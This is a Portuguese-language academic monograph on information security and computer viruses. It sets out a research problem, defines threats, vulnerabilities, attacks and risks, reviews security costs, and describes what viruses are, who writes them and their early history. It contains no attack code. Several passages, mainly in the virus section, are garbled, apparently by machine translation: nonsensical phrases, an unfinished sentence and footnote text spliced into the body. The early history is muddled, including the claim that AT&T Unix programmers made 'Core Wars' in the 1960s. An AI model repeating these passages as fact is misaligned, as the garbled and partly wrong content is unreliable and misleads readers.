Página anterior | Voltar ao início do trabalho | Página seguinte |
Problema Científico: De que maneira manual que fundamente a acção dos vírus electrónico em um sistema informático, com recomendações preventivas que propiciem uma utilização exitosa dos computadores e softwares de protecção mais usados na luta contra os vírus electrónicos pode contribuir para a redução de infecção por vírus electrónicos?
Uma vez diagnosticado o problema, formulou-se o seguinte objectivo geral:
Objectivo Geral: Fundamentar teoricamente a acção dos Vírus electrónicos em um sistema informático computacional
Objectivos Específicos:
Realizar o estudo bibliográfico;
Demostrar como um vírus electrónico destrói um sistema informático;
Elaborar Recomendações Preventivas;
Destacar os Softwares de protecção mais usados na luta contra os vírus electrónicos.
Objecto de estudo:
Vírus Electrónicos
Campo de acção:
Acção dos Vírus electrónicos no sistema Informático.
Hipótese: A elaboração de um manual que fundamente a acção dos vírus electrónico em um sistema informático, com recomendações preventivas que propiciem uma utilização exitosa dos computadores e softwares de protecção mais usados na luta contra os vírus electrónicos pode contribuir para a redução de infecção por vírus.
Conceitos básicos
Afim de melhor e compreender-se a inserção da segurança da informação sob os diferentes aspectos em que se apresenta, tendo em vista evitar-se o reducionismo tecnológico sob o qual é geralmente apresentada, é fundamental que ela seja vislumbrada à luz de alguns dos conceitos da disciplina da qual é tributária - a Ciência da Informação. Ambas focalizam a informação do ponto de vista de seus aspectos estruturais, reconhecendo que conceitos como "significado", "valor" e "relevância", quaisquer que sejam seus entendimentos, são dependentes do contexto organizacional em que se insere o objecto de seu estudo ou aplicação, qual seja, a informação em si mesma. Deste modo, a interação entre a segurança e o contexto organizacional, interação esta que se manifesta sob as nuances da cultura organizacional e do comportamento individual perante o ambiente informacional, deve ser igualmente foco de interesse da segurança, como se verá em detalhes adiante. De antemão, cumpre salientar-se a seguinte evidência: o grau de "valor" e de "relevância" conferido à segurança da informação pela organização deve estar diretamente relacionado ao grau dos mesmos conceitos quanto aplicados à informação.
Outro conceito extremamente valioso à Ciência e à segurança da informação é o da interdisciplinaridade.
O caráter interdisciplinar, no tocante à Ciência da Informação, é direta ou indiretamente abordado por vários estudiosos do tema e permeia um sem-número de discussões e relatos históricos, tais como as asserções e considerações apresentadas por Saracevic (1995, 1999) e Lesk (1995). Contudo, quer-se enfatizar aqui o que já fora enunciado por Bates (1999), ao apontar a Ciência da Informação como elemento central às atividades de representação e organização da informação. Em seu texto, a autora aponta que o domínio da Ciência da Informação é o universo da informação registrada, selecionada e armazenada para acesso posterior, salientando ainda que a representação da informação difere do seu conhecimento;
No presente trabalho, ressalta-se que, na mesma extensão em que não se pode imaginar o conhecimento sem a representação da informação, a segurança difere dos meios de coleta, armazenamento e disseminação, mas não pode prescindir deles para sua subsistência. Mais ainda, num arco simétrico, é exatamente a segurança que visa proporcionar a estes meios a garantia de atingirem adequadamente os seus objetivos. A fim de elucidar este paralelo que se deseja criar e para caracterizar-se adequadamente a segurança da informação tal como se procura entendê-la em suas diversas nuances, cabe introduzir-se alguns dos elementos básicos concernentes ao
tema, apresentando sua abrangência e complexidade.
Ameaças
Uma das definições apresentadas para ameaça é "evento ou atitude indesejável (roubo, incêndio, vírus, etc.) que potencialmente remove, desabilita, danifica ou destrói um recurso" (DIAS, 2000, p. 55). A mesma autora apresenta o item recurso como sendo "componente de um sistema computacional, podendo ser recurso físico, software, hardware ou informação" (DIAS, 2000, p. 55). Perceba-se que não se fala sobre o recurso humano - a esta altura, o leitor deste trabalho já se deve ter percebido como este componente tem importância fundamental sobre todos os eventos afeitos à segurança da informação. Esta vertente acredita, assim, que o homem pode ocasionar algum dano ao sistema, mas não se reconhece que ele pode ser também uma vítima de algum ato, deliberado ou não, capaz de ocasionar a ele ou à organização uma perda informacional sensível. Acrescente-se a isto o fato de que, embora muitos gestores aleguem reconhecer a segurança da informação como importante, nem sempre lhe é dada a sua real relevância, e tem-se um quadro não muito animador sobre o tema.
Com o advento das redes de longo alcance, principalmente a Internet, tem-se uma característica complicadora para este cenário: a capacidade de anonimato, ou mesmo de desindividualização (ausência de características que permitam a identificação de autoria) das acções executadas em rede. Um usuário pode, em tese, se fazer passar por virtualmente qualquer outra pessoa, não importando de que etnia, género ou grupo social, desde que esteja disposto a tanto e tenha acesso aos recursos computacionais requeridos para esta tarefa, os quais são, em geral, exíguos. Tal situação é a tal ponto crítica que leva, em muitos casos, à adopção obrigatória de mecanismos de identidade electrónica, como a certificação digital, à procura de modalidades.
Como exemplo de análise de ameaças à segurança da informação em ambientes computacionais, cite-se o estudo realizado em 2002 por Whitman (2003), o qual procurou responder a três questões primordiais:
1. Quais são as ameaças à segurança da informação?
2. Quais são as mais danosas ao ambiente organizacional?
3. Qual a frequência com que eventos baseados nelas são observados?
Em resposta à primeira pergunta, foram listadas doze categorias de ameaças potenciais, obtidas a partir de trabalhos anteriores e da entrevista com três security officers. Estas doze categorias são as seguintes, já dispostas em ordem decrescente de severidade percebida, conforme respostas obtidas pelo survey online realizado com organizações de diferentes portes e áreas de atuação (o autor não cita o número de instituições envolvidas na pesquisa):
1. Eventos deliberados cometidos com o uso de software (vírus, vermes, macros, negações de serviço);
2. Erros ou falhas técnicas de software (falhas de codificação, bugs);
3. Falhas ou erros humanos (acidentes, enganos dos empregados);
4. Actos deliberados de espionagem ou invasão, hacking;
5. Actos deliberados de sabotagem ou vandalismo (destruição de sistemas ou informação);
6. Erros ou falhas técnicas de hardware (falhas de equipamentos);
7. Actos deliberados de furto (de equipamentos ou de informação);
8. Forças da natureza (terremotos, enchentes, relâmpagos, incêndios não intencionais);
9. Comprometimento à propriedade intelectual (pirataria, infração a direitos autorais);
10. Variação da qualidade de serviço (Quality of Service - QoS) por provedores (como energia
elétrica e serviços de redes remotas de telecomunicação);
11. Obsolescência técnica;
12. Actos deliberados de extorsão de informação (chantagem ou revelação indevida de informação).
Vulnerabilidades
Uma vulnerabilidade representa um ponto potencial de falha, ou seja, um elemento relacionado à informação que é passível de ser explorado por alguma ameaça - pode ser um servidor ou sistema computacional, uma instalação física ou, ainda, um usuário ou um gestor de informações consideradas sensíveis. Dada a incerteza associada aos activos e às vulnerabilidades
Incidentes
O Internet Engineering Task Force - IETF, organização independente dedicada à análise e prevenção de eventos de segurança e à gestão da rede, define incidente como sendo "um evento que envolve uma violação de segurança" (SHIREY, 2000). Uma definição mais voltada à autoria e ao tipo do evento é dada por Howard e Meunier (2002): "um ataque ou um grupo de ataques que pode ser diferenciado de outros ataques pela distinção dos atacantes, ataques,
objetivos, sites e ocasião".
Ataques
Por sua vez, um ataque corresponde à concretização de uma ameaça, não necessariamente bem-sucedida (do ponto de vista do atacante), mediante uma ação deliberada e por vezes meticulosamente planejada.
Uma vez que a geração de ataques é originada por pessoas, ainda que com o uso de recursos computacionais ou de outra natureza, a sua prevenção torna-se extremamente complexa por meios automatizados. De fato, Schell (2001) afirma que não há ciência capaz de eliminar definitivamente os incidentes de segurança da informação, restando a opção da constante vigilância e verificação.
Deve-se observar, ainda, que os ataques podem ser de origem externa ou interna à organização.
Schultz (2002) aponta que os ataques de origem interna, que, ao contrário do que se apregoa, não necessariamente são em maior número que os externos, possuem motivações e padrões diversos daqueles, exigindo, assim, análise e contramedidas diferenciadas.
Riscos
Diversas abordagens têm sido apresentadas para o tratamento de riscos, ou para averiguar de que maneira a prevenção de riscos pode influenciar a gestão da segurança da informação. De qualquer modo, é consensual que o risco deve ser adequadamente medido e avaliado, possibilitando a criação de medidas preventivas voltadas à sua diminuição.
O risco pode ser definido como as perdas, incluindo perdas em vidas humanas, que podem ocorrer mediante a adoção de determinado curso de ação. Pode-se medir o risco em termos da utilidade monetária envolvida ou pela variância da distribuição de probabilidade de eventuais perdas e ganhos associados a alguma alternativa em particular. É senso comum que o risco jamais pode ser integralmente eliminado (GUAN et al., 2003). Ao se engajar em atividades de avaliação e prevenção de riscos, as organizações têm em vista este senso comum.
A norma BS7799, formulada pelo British Standards Institute e que inspirou a norma ISO/IEC 17799, cuja primeira parte 7 foi implementada no Brasil por meio da norma NBR 17799, descreve os controles de segurança requeridos no ambiente organizacional e preconiza que os sistemas de gestão de segurança da informação devem se focam na gestão de riscos a fim de atingir 7A segunda parte diz respeito à implementação de modelos de sistemas de gestão de segurança da informação.
O conceito vigente de Segurança da Informação
A literatura especializada é pródiga na apresentação de conceitos do que a segurança da informação faz e de quais são os domínios de sua actuação, mas não do que ela de fato é. Ou seja, abundam as análises funcionais, mas são escassas as análises descritivas da segurança da informação.
Pemble (2004) sugere que a segurança da informação deve ser definida em termos das atribuições do profissional que é responsável por ela. O artigo descreve três esferas de actuação de tais profissionais, em torno das quais a segurança deveria ser parametrizada e compreendida:
A esfera operacional, voltada ao impacto que os incidentes podem gerar à capacidade da organização de sustentar os processos do negócio;
A esfera da reputação, voltada ao impacto que os incidentes têm sobre o valor da "marca" ou sobre o valor acionário;
A esfera financeira, voltada aos custos em que se incorre na eventualidade de algum incidente.
Arce (2003a) lembra que diversos tipos de ataques em redes produzem resultados sobre a informação no nível semântico, ou seja, atuam sobre o significado da informação, modificando-o.
A mudança de rotas de acesso em redes e a falsificação de endereços de servidores computacionais são exemplos destes ataques. Contudo, as ferramentas de detecção e prevenção atuam no nível sintático: elas tratam cadeias de caracteres em busca de padrões ou sequências não esperadas, como é o caso de um software anti-vírus ou de uma ferramenta de prevenção de intrusões. Esta diferenciação produz um descompasso evidente entre "caça" (atacante) e "caçador" (profissional da segurança): eles simplesmente atuam em níveis epistemológicos distintos, requerendo abordagens diferenciadas das atualmente utilizadas para a solução efetiva do problema.
Uma das frases mais citadas no contexto da segurança da informação é que "uma corrente é tão resistente quanto seu elo mais fraco". É comum a asserção de que o elo mais fraco da corrente da segurança da informação seja o usuário, uma vez que os recursos computacionais já estariam protegidos por considerável acervo tecnológico... Arce (2003b) sugere que os sistemas
operacionais das estações de trabalho e seus usuários seriam os mais vulneráveis a ataques internos e externos - contudo, como já se viu, o complexo que a segurança abrange requer atenção a todos os níveis de usuários e sistemas.
Outro aspecto que se tem mostrado extremamente relevante é o custo da segurança da informação.
Geer Jr, Hoo e Jaquith (2003) mostram o custo relativo para a correção de falhas
de segurança em softwares em cada estágio do processo de desenvolvimento, conforme ilustra a Tabela 4. Como se vê, quanto mais tardiamente as falhas são detectadas e corrigidas, tanto maior é o custo em que se incorre.
Todas as definições e proposições acima baseiam-se ou derivam de conceitos da segurança da informação sendo vista como um domínio tecnológico, onde ferramentas e recursos tecnológicos são aplicados em busca de soluções de problemas gerados, muitas vezes, com o concurso daquela mesma tecnologia. Evidencia-se a necessidade de uma compreensão mais abrangente destes problemas.
A necessidade de um novo conceito de segurança da informação
A ausência de um conceito exato do que seja a segurança da informação já foi abordada, entre outros, por Anderson (2003). O autor cita vários textos que sugerem uma definição para o termo, mas que na verdade apresentam as atribuições ou resultados esperados pela aplicação da segurança da informação. Ele apresenta seu próprio conceito: "Um sentimento bem fundamentado da garantia de que os controles e riscos da informação estão bem equilibrados", discorrendo em seguida sobre cada uma das partes componentes da definição, à qual voltar-se-á em breve.
Hitchings (1995) apresentava, já há mais de uma década, a necessidade de um conceito de segurança da informação no qual o aspecto do agente humano tivesse a devida relevância, tantocomo agente como paciente de eventos de segurança (ataques, mais especificamente).
Mesmo no aspecto tecnológico, sugestões como a de Stergiou, Leeson e Green (2004) de um alternativa ao modelo da OSI, ou como a de Aljareh e Rossiter (2002) de um modelo de segurança colaborativo, têm sido apresentadas em contraposição ao modelo vigente.
Incidentes de segurança da informação
A literatura, principalmente a não especializada, é rica em relatos de incidentes de segurança da informação. Na verdade, para o público leigo, este é o aspecto mais saliente da segurança: ela é muito mais conhecida por suas falhas e imperfeições que pelos sucessos que possa vir a colher.
Furnell, Chiliarchaki e Dowland (2001) apresentam um problema particularmente sensível para os profissionais de segurança da informação: o uso de ferramentas de segurança para perpetrar ataques. Com a disseminação de soluções de código aberto, muitas ferramentas originalmente desenvolvidas para a detecção de vulnerabilidades em redes, por exemplo, são distribuídas gratuitamente em praticamente todo o mundo. Este argumento, por sinal, tem sido utilizado por opositores ao modelo de software de código aberto, mas com conseqüências presumivelmente limitadas.
A abrangência da segurança da informação
Embora a necessidade pela segurança da informação e os requisitos que almejam satisfazêla estejam muito bem definidos e sejam amplamente conhecidos, conforme pode-se ver em Schneier (1996, 2000), Krause e Tipton (1999) e Alberts e Dorofee (2002), dentre outros, o estágio atual da segurança da informação assiste a um panorama no mínimo pessimista: de um lado, a engenharia de software propõe-se a desenvolver sistemas cuja aplicabilidade é medida quase que exclusivamente em termos práticos, atendendo-se a pressupostos do tipo "o sistema atende às finalidades para as quais foi concebido" 8 (PRESSMAN, 1995); de outro, assiste-se a um número cada vez maior de ocorrências de falhas de segurança relativas a sistemas de informação que não contemplaram adequadamente os conceitos da segurança em sua formulação (SCHNEIER, 2000).
A disseminação de meios maciços de acesso à informação, com a integração organizacional por meio da informática (FLORES et al., 1988) e posteriormente com a proliferação da Internet e de redes corporativas, ao mesmo tempo em que introduz formas de fácil e rápida utilização dos recursos computacionais, expõe ainda mais a fragilidade e os riscos a que estão sujeitos os usuários, os sistemas e os dados armazenados e tratados por tais sistemas. Para citar-se um caso restrito ao Brasil, a iniciativa que visava à inclusão digital e que era preconizada pelo Poder Público por meio do Programa Sociedade da Informação (TAKAHASHI, 2000), aponta o foco da "segurança" como essencial ao provimento de serviços de governo 9. O mesmo raciocínio pode ser aplicado a outras finalidades de sistemas de informação, tais como o comércio eletrônico e o acesso a páginas de instituições financeiras por meio da internet. Em todos estes casos, a preocupação com a segurança permeia os sistemas desenvolvidos, sendo item obrigatório para a sua implementação.
Entretanto, as formas correntes de implementação de mecanismos de segurança em sistemas de informação, como a criptografia, que é utilizada como prevenção ou solução para falhas em segurança na ampla maioria dos casos, são notadamente técnicas, e tendem a sê-lo em grau cada vez maior, haja vista o fato de as iniciativas apresentadas se basearem em actualizações
e sofisticações da tecnologia (WOOD, 2000; SCHNEIER, 2000). Estas implementações incorporam elementos que, se não forem devidamente analisados, podem resultar em impactos negativos que se contrapõem e até mesmo anulam os benefícios alcançados, seja por não se incorporarem adequadamente aos sistemas de informação sobre os quais são implementados, seja A esta exigência, a segurança apresenta um adendo: "o sistema realiza as atividades para as quais foi concebido, e somente estas".
9TAKAHASHI, op. cit., p. 99
Por trazerem consigo outras falhas inesperadas, por vezes maiores que as falhas que se tentava corrigir (SCHNEIER, 2000). Esta abordagem da segurança da informação termina por gerar uma série de barreiras que impedem a utilização adequada e amigável dos sistemas por parte de seus usuários.
Os mecanismos de análise e de formalização de políticas de segurança atualmente em voga, tais como a norma International Organization for Standardization/ International Electrotechnical Commission - ISO/IEC 17799, cuja adoção no Brasil se deu por meio da norma da Associação Brasileira de Normas Técnicas - ABNT Norma Brasileira de Referência – NBR 17799 (ABNT, 2002), ou a descrição de recomendações de institutos de tecnologia e de padrões (BASS, 1998), partem de pressupostos representados por "melhores práticas" (WOOD, 2002b),
ou seja, adota-se um conjunto de procedimentos "ad hoc", definidos de forma empírica e exclusivamente voltados a aspectos técnicos, deslocados do contexto humano e profissional em que se inserem.
Cumpre observar que os sistemas de informação, mormente aqueles digitais, em ampla voga no contexto da Sociedade da Informação, encontram-se, naturalmente, envoltos por completo em ambientes do mundo real, estando sujeitos a várias formas de ações afeitas à sua segurança, tais como negações de serviço, fraudes, roubos, tentativas de invasão, corrupção e outras atividades hostis (SCHNEIER, 2000; WOOD, 2002a; BOSWORTH; KABAY, 2002).
Em resposta a estas hostilidades, a segurança da informação, em seu sentido mais abrangente, envolve requisitos voltados à garantia de origem, uso e trânsito da informação, buscando certificar todas as etapas do seu ciclo de vida. Estes requisitos podem ser resumidos na forma do três primeiros itens a seguir (ABNT, 2002), aos quais algumas abordagens agregam ainda os
dois últimos (KRUTZ; VINES, 2002; KRAUSE; TIPTON, 1999):
Confidencialidade: garantia de que a informação é acessível somente por pessoas autorizadas a realizarem tal acesso (JONSSON, 1998);
Integridade: garantia de não violação da informação e dos métodos de seu processamento 10;
Disponibilidade: garantia de que os usuários devidamente autorizados obtenham acesso à informação e aos recursos computacionais correspondentes, sempre que necessário;
Autenticidade: garantia de que a informação é de fato originária da procedência alegada;
É comum confundir-se integridade com corretude, mas um exemplo banal ilustra a distinção entre ambas:
Imagine-se uma mensagem cujo conteúdo original seja "2+2=5"; caso, ao ser transmitida, tal mensagem chegue ao seu destino com esta mesma disposição, ela mostra-se íntegra, porém, não é correta. Isto salienta também a distinção entre estrutura e significado, ao qual, conforme já se disse, a segurança não está afeita. Note-se que estes dois conceitos pertencem a domínios distintos de representação: sintático e semântico.
Irretratabilidade ou não repúdio: garantia de que não se pode negar a autoria da informação, ou o tráfego por ela percorrido.
Deste modo, a segurança se faz presente nas arquiteturas e modelos da informação, neles inserindo-se em todos os níveis. Entretanto, observa-se um número crescente de ocorrências de incidentes relativos à segurança da informação. Fraudes digitais, furtos de senhas, cavalos de tróia (códigos de programas aparentemente inofensivos, mas que guardam instruções danosas ao usuário, ao software ou ao equipamento), vírus e outras formas de ameaças têm se multiplicado vertiginosamente.
Estes, por sua vez, apresentam-se em número e crescimento muito superiores às vulnerabilidades, mesmo porque a reiterada exploração de uma mesma vulnerabilidade pode ocasionar múltiplos incidentes. Observe-se, ainda, que um mesmo incidente que atinja diversas instalações (como a infecção por um mesmo vírus em centenas de milhares de computadores, por exemplo) é contabilizado como um único caso para a confecção do gráfico. A evolução destes incidentes atesta o fato de que a tecnologia por si só, da forma como vem sendo empregada, não é capaz de solucionar semelhantes problemas, levando à ocorrência de um círculo vicioso: a aplicação da tecnologia aumenta o volume de ameaças
- Introduz-se mais vulnerabilidades -, às quais procura-se combater com maior aporte tecnológico.
Este enfoque é resultante de uma visão canhestra da situação, que considera tão-somente os aspectos tecnológicos ali relacionados. Correntemente, para contemplar este problema a partir de uma abordagem abrangente, procede-se à adoção de estratégias organizacionais de segurança, as quais são implementadas com base em políticas de segurança institucionais.
Os requisitos do desenvolvimento de software
Pfleeger (1997) aponta para a necessidade de avaliar-se os fundamentos da segurança nos requisitos de software, a fim de garantir que as funcionalidades do sistema serão atendidas, e somente elas. O autor aponta uma lacuna em alguns padrões de qualidade de software, que, como a ISO 9126, não incluem o aspecto da segurança, e propõe que se implemente de modo continuado o aprendizado das técnicas de segurança entre os desenvolvedores, que devem ainda "pensar como o atacante" e "sempre consultar um especialista em segurança".
Carr, Tynan e Davis (1991) preconizam a segurança da informação como parte da prática de garantir a segurança do software, e cita o exemplo da National Aeronautics and Space Administration - NASA no início da década de 1990, que, necessitando de software de qualidade para os seus projetos, criou e utilizou padrões de desenvolvimento que se tornaram modelos na indústria.
Wang e Wang (2003) também apontam para a necessidade de qualidade de software e segurança.
Para estes autores, abordagens adequadas à segurança são feitas por meio de padrões e políticas, com o uso de bibliotecas e ferramentas de desenvolvimento e por meio da gestão administrativa do ciclo de desenvolvimento de sistemas e ferramentas físicas de manutenção.
Tryfonas, Kiountouzis e Poulymenakou (2001) salientam, do mesmo modo, que a segurança da informação deve ser inserida nas etapas de desenvolvimento de software. Os autores apontam a necessidade de um mercado global de segurança da informação e advogam que os níveis de práticas de segurança devem ser os mesmos níveis do planejamento organizacional (estratégico, tático e operacional), lembrando ainda sobre a dificuldade de uso de políticas para a efetiva segurança da informação.
Antón, Earp e Carter (2003) alertam que as políticas são independentes dos sistemas, devendo estes dois conjuntos ser harmoniosamente associados. Os autores salientam algumas abordagens aos requisitos de segurança e apresentam frameworks para a análise de riscos, tais como Lichtenstein (para gestão holística do risco) e PFIRES (Policy Framework for Interpreting Risk in eCommerce Security).
Arbaugh (2002) alerta para o fato de que elementos como o custo e a performance impedem a adequada integração dos fundamentos da segurança aos requisitos do software. Ressalta a necessidade de, em respeito à facilidade de uso, implementar-se proteção sem que ela se torne aparente ou agressiva. Um outro aspecto é lembrado por este autor: qualquer programa, não importa quão inócuo seja, pode carregar falhas de segurança. Embora a interação entre as equipes de segurança e desenvolvimento seja essencial, os profissionais da segurança não têm controle sobre o processo de desenvolvimento; logo, administram-se riscos. A fim de garantir-se o adequado acompanhamento dos requisitos de segurança, deve-se quantificar o valor da informação protegida, as ameaças àquela informação e o nível desejado de garantias. Com respeito às vulnerabilidades presentes no código dos sistemas atuais, alerta que quase 50% delas são devidas a buffer overflow, ou seja, acesso a endereços inválidos devido a instruções internas ao código dos programas, decorrentes de práticas inadequadas de programação.
Aplicações da segurança da informação
As formas de aplicação da segurança da informação estão geralmente ligadas às ameaças ou vulnerabilidades identificadas ou que se deseja prevenir ou remediar. Contudo, mesmo o reconhecimento destas ameaças e vulnerabilidades não é trivial, ainda que após a ocorrência de um ataque que as explore. Korzyk Sr (1998) sugere que, em 1998, menos de 1% dos ataques
era devidamente identificada e relatada, no caso da internet. Com a ampla utilização desta rede, os problemas se multiplicam de forma avassaladora. Para cada uma das formas de utilização da rede, dentre as quais algumas das principais serão mostradas a seguir, existem ameaças e vulnerabilidades correspondentes.
O custo da segurança da informação
Naturalmente, a segurança da informação tem um custo. Contudo, sua ausência tem um custo ainda maior, seja econômico, seja social, na figura de uma imagem negativa perante o público.
Garg, Curtis e Halper (2003) alertam para os impactos econômicos da segurança da informação, propondo uma metodologia baseada em eventos (tipos de incidentes) para a sua análise, com reflexos sobre o valor acionário da organização em questão.
Pemble (2003) relembra a necessidade do balanceamento do orçamento voltado à segurança com os ativos que se pretende tratar: deve haver proporcionalidade entre investimentos e ativos.
Mercuri (2003) aponta a necessidade do uso de ferramentas de quantificação de custos, mesmo para as alternativas ditas como livres ou gratuitas. A autora alerta ainda para a influência de fatores culturais sobre a análise de riscos.
Gordon e Loeb (2002b) e Wood e Parker (2004) lembram que os investimentos em segurança da informação não podem ser tratados como outros tipos de investimentos. Por exemplo, a técnica de retorno do investimento (Return on Investment - ROI), utilizada para investimentos de caráter geral, não se aplica à segurança, pois ela não necessariamente se associa a bens tangíveis ou de retorno mensurável por medidas convencionais. Gordon e Loeb (2002a) apresentam, ainda, um modelo para a mensuração do investimento ótimo para se proteger ativos de informação, lembrando que o investimento não é necessariamente proporcional à vulnerabilidade.
Lembram também que as organizações, em geral, podem investir para reduzir as vulnerabilidades, mas não as ameaças.
Gordon, Loeb e Sohail (2003) e Gordon, Loeb e Lucyshyn (2003), assim como Gordon e Richardson (2004), alertam para os custos inerentes às práticas de compartilhamento de informação, essenciais em mercados competitivos e em organizações globalizadas.
Anderson (2001) aborda diversas questões essenciais aos custos da segurança da informação, dentre os quais a opção de terceirizar-se a análise de segurança, deixando-a a cargo de especialistas, opção adotada por grande parte das organizações. Há que se observar que por melhor que seja o domínio da contratada acerca do tema da segurança, dificilmente ela terá amplo conhecimento sobre o tema do negócio da organização contratante. O autor lembra ainda o que a Economia chama de "a tragédia dos bens comuns" - quando um número elevado de usuários faz uso de determinado recurso, um a mais não faz diferença. Contudo, pode ser justamente este último a origem de uma série de problemas. Deste modo, há que se implementar soluções por meio de regulamentação ou de aspectos culturais, e não meramente por meios tecnológicos.
O mesmo texto aborda ainda três características dos mercados de tecnologias da informação, a saber:
O valor de um produto para um usuário depende de quantos outros usuários adoptarem o mesmo produto;
A tecnologia tem, frequentemente, custos fixos altos e custos marginais baixos: a primeira cópia de um software ou de um chip pode custar milhões, mas as demais podem ter custos quase desprezíveis; deste modo, os bens são comercializados com base no valor e não no custo;
Os custos associados à mudança de tecnologia são elevados, mesmo que para plataformas consideradas livres ou gratuitas.
Estas três características levam ao aparecimento de grandes monopólios de tecnologia, no modelo da Microsoft, que, por sinal, adopta uma interessante forma de distribuição de produtos:
Realiza-se a entrega imediatamente, assim que o produto é anunciado, mas o produto só será de boa qualidade por volta da terceira versão.
Por tudo isto, o perfeito estabelecimento da diferença entre custo, preço e valor é fundamental para a determinação de políticas objectivas de investimentos em recursos tecnológicos e também em segurança da informação.
Henessy e Babcock (1998) salientam o valor da informação como elemento modificador da incerteza rumo à variabilidade conhecida.
Campbell et al. (2003) estudaram a reacção do mercado ao anúncio de falhas de segurança, mostrando que as consequências de tais eventos podem se traduzir sobre o valor accionaria da organização, principalmente quando a falha ocorrida relaciona-se à revelação de informações confidenciais.
Por fim, Rajan e Zingales (2000) alertam para "a tirania da desigualdade" em negociações onde os participantes possuem grandes diferenças de poder de negociação.
Vírus electrónicos
Os vírus de computador são um grande risco a segurança para os sistemas, estamos a falar de um usuário doméstico que usa seu computador para trabalhar e se conectar a uma rede da internet ou uma empresa com um sistema computacional principal a ser mantidos sob vigilância para evitar perdas de informação causadas por vírus.
O vírus usa uma técnica conhecida ou pouco conhecida para cumprir a sua missão. Assim, encontramos vírus muito simples que é dedicado exclusivamente à apresentação de mensagens na tela e alguns outros muito mais complexo do que tentar esconder a sua presença e atacar no momento certo.
Ao longo deste trabalho, referem-se exactamente o que é um vírus, como ele funciona, alguns tipos de vírus e como combatê-los. Pretendemos dar uma visão geral dos vírus existentes, a fim de se concentrar mais em como proteger um sistema computacional e como erradicar estes ataques, uma vez penetrados.
O que é um vírus electrónico?
Segundo a Wikipédia (enciclopédia livre) define m vírus de computador como sendo um programa de computador que tem a capacidade de causar dano e sua característica mais marcante é que ele pode se replicar e se espalhar para outros computadores. Infecta "entidades executável" significa qualquer arquivo ou sector da unidade de armazenamento com os códigos de instrução, ter executado a cerca de processador. É programado em linguagem assembly e, portanto, requer algum conhecimento do funcionamento interno do computador.
Um vírus possui três características principais:
O Dano: Um vírus de computador sempre causa danos ao sistema que infecta, mas é claro que o dano não significa que cerca de quebrar alguma coisa. O dano pode estar implícita, quando o que se pretende destruir ou alterar informações ou pode haver
situações com efeitos negativos para o computador, como o consumo de tempo do processador da memória principal, diminuição da performance.
É autoreplicante: Em minha opinião, a característica mais importante deste tipo de programa é criar mais cópias de si mesmo, algo que nenhum outro programa convencional. Imagine se que se todos tivessem essa capacidade poderia instalar um processador de texto e um par de dias mais tarde, teríamos três deles ou mais. Encaramos isso como uma característica de chamada automática de vírus porque os programas convencionais podem causar danos, mesmo que acidentalmente, substituindo algumas livrarias e pode ser escondido da vista do usuário, por exemplo, um software que lidar com cópias legítimas software instalado.
É sub-reptício: Isso significa o vírus irá utilizar diversas técnicas para impedir que o utilizador se aperceba da sua presença. O primeiro passo é ter um tamanho reduzido de forma a esconder um primeiro relance. O utilizador pode começar a manipular o resultado de uma solicitação para o sistema operacional estratégias que o tamanho do arquivo e até mesmo todos os seus atributos.
O perigo real de um vírus não é dado instruções para o seu arsenal de mal, se o sistema não é tão crítico infectado. Tomemos por exemplo um vírus, ou coelho. Se isso infectar um computador em casa iria pendurar a máquina que pode ser reposto com um disco de inicialização com um antivírus para remover vírus. Se afectando um servidor SMB, provavelmente, o sistema de computadores da empresa iria parar de funcionar por algum tempo signifi-ing um tempo perdido e máquina de fazer dinheiro. Mas se o vírus infectar uma máquina industrial como um guindaste ou um dispositivo robótico usado na medicina como uma máquina de raio laser para operar, os custos seriam muito elevados e é provável que a perda de vidas. O que se alterou o prontuário de uma pessoa, de modo a mostrar um tipo de sangue fator RH ou diferentes? O paciente pode morrer. E se o dígito 4000000 nos cálculos para o tie-rrizaje de uma missão espacial foi alterado em 0001 por um fator de 100? Os astronautas morreriam. Os vírus de computador não pode causar dano direto sobre o hardware. Não há instruções para derreter o disco rígido ou pop que o cano de um monitor. Em seus defeitos para, um vírus pode executar operações que reduzem a vida útil dos dispositivos. Por exemplo: para fazer a placa de som para enviar sinais de diferentes frequências, com um volume elevado de aves Aumentar os alto-falantes, fazem a cabeça de impressão move-se lado a lado ou chocar-se contra um lado, fazer unidades de armazenamento móveis em alta velocidade cabeças L / E para ser usado. Todas essas coisas são possíveis, mas altamente improvável e, geralmente, preferem atacar os arquivos de vírus e não mexer com o físico.
Quem cria os virus electronicos?
Primeiro devemos dizer que os vírus de computador são feitos por pessoas com conhecimentos de programação, mas não necessariamente o gênio dos computadores. Eles têm know-how da linguagem assembly e como o computador funciona internamente. Na verdade, é bastante mais difícil fazer um programa "em ordem", como um sistema de faturamento, onde há muitas mais coisas a ter em conta que um simples vírus que é mal planejado, mas seria o suficiente para irritar o usuário.A princípio, esses programas foram projetados quase exclusivamente por hackers e crackers que teve seu auge nos Estados Unidos, que abalou as empresas com o pensamento de suas atividades. Talvez essas pessoas fizeram com a necessidade de demonstrar a sua criatividade e domínio de informática, por diversão ou como uma forma de expressar sua rejeição da sociedade que os oprimia. Hoje, eles são um bom meio de sabotagem empresarial, espionagem e danos materiais a uma empresa particular.
Resenha Histórica dos Vírus Electrónicos
Os Vírus têm a mesma idade que os computadores. Em 1949, John Von Neumann, descreve os programas que se reproduzem em seu livro "Teoria de Autómatos e Organização complicadas". E muito tempo depois começou-se a chamar, como vírus. A propriedade de auto-reprodução e mutação desses programas, tornando-os semelhantes aos dos vírus biológicos, parece ser a origem do nome pelo qual conhecemos hoje.
Antes da explosão do micro computador falavasse muito pouco sobre eles. Por um lado, a computação era um segredo de poucos. Por outro lado, as agências governamentais, científicas ou militares, que viram os seus computadores atacados por vírus, não estava muito tranquilo, para mostrar a fragilidade dos seus sistemas de segurança, que custou milhões, nos bolsos dos contribuintes. As empresas privadas como bancos ou grandes empresas, que não podia dizer nada, para não perder a confiança de seus clientes ou acionistas. O que se sabe sobre o vírus de 1949-1989, muito pouco.
É reconhecido como um antecedente dos vírus de hoje, um jogo criado pelos programadores da AT & T, que desenvolveu a primeira versão do sistema operacional Unix na década de 60. Para o entretenimento, e como parte de suas pesquisas, eles desenvolveram um jogo chamado "Core Wars", que teve a capacidade de reproduzir toda vez que ele é executado. Este programa foi instruções destinadas a destruir a memória do rival ou não ao trabalho. Ao mesmo tempo, Ron desenvolveu um programa chamado "Reeper", que destruíram as cópias feitas pelo "Core Wars". Um antivírus ou antibióticos, óptica, como são conhecidos hoje. Consciente do perigo do jogo, decidiu mantê-lo secreto e não falar mais sobre isso. Não está claro se essa decisão fosse sua própria iniciativa ou por ordens superiores.
